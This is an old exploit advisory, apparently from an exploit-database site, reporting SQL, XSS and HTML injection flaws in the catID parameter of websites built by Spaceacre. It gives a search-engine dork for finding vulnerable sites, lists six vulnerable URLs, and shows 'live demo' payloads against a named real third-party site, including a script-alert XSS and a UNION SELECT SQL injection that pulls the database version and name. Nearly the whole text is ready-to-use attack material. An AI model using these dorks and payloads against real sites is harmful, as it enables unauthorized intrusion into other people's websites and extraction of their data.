=========================================================
Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
=========================================================
#########################################
# Name: Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities
# Vendor: http://www.spaceacre.com
# Date: 2010-05-26
# Author: XroGuE
# Thanks to: Inj3ct0r.com [R0073r],Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
##########################################
[+] Dork: intext:"Designed by Spaceacre"
[+] Vulnerabilities:
#http://[target]/cat1.php?catID=[SQL/XSS/HTML]
#http://[target]/cat2.php?catID=[SQL/XSS/HTML]
#http://[target]/cat3.php?catID=[SQL/XSS/HTML]
#http://[target]/cat4.php?catID=[SQL/XSS/HTML]
#http://[target]/cat5.php?catID=[SQL/XSS/HTML]
#http://[target]/cat6.php?catID=[SQL/XSS/HTML]
[+] XSS InjecTion Vulnerability:
[+] Live Demo: http://www.baselinengn.com/cat1.php?catID=<script>alert(/XroGuE/);</script>
http://www.baselinengn.com/cat2.php?catID=<script>alert(/XroGuE/);</script>
http://www.baselinengn.com/cat3.php?catID=<script>alert(/XroGuE/);</script>
http://www.baselinengn.com/cat4.php?catID=<script>alert(/XroGuE/);</script>
###########################################
[+] HTML InjecTion Vulnerability:
[+] Live Demo: http://www.baselinengn.com/cat1.php?catID=<font color=red size=15>XroGuE</font>
http://www.baselinengn.com/cat2.php?catID=<font color=red size=15>XroGuE</font>
http://www.baselinengn.com/cat3.php?catID=<font color=red size=15>XroGuE</font>
http://www.baselinengn.com/cat4.php?catID=<font color=red size=15>XroGuE</font>
###########################################
[+] SQL InjecTion Vulnerability:
[+] Live Demo : http://www.baselinengn.com/cat1.php?catID=-999+union+all+select+1,version(),database()--
###########################################